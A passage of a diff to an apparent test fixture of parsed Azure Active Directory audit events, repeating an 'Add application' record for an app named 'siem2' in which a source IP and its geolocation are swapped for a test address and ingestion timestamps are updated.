argetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 
1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -13229,25 +12095,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -13261,7 +12109,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -13387,7 +12235,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -13399,12 +12247,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036447300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\"
:\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": 
\\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125207800Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 
1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -13430,25 +12278,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -13462,7 +12292,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -13588,7 +12418,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -13600,12 +12430,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036451600Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\"
:\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": 
\\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125212900Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n 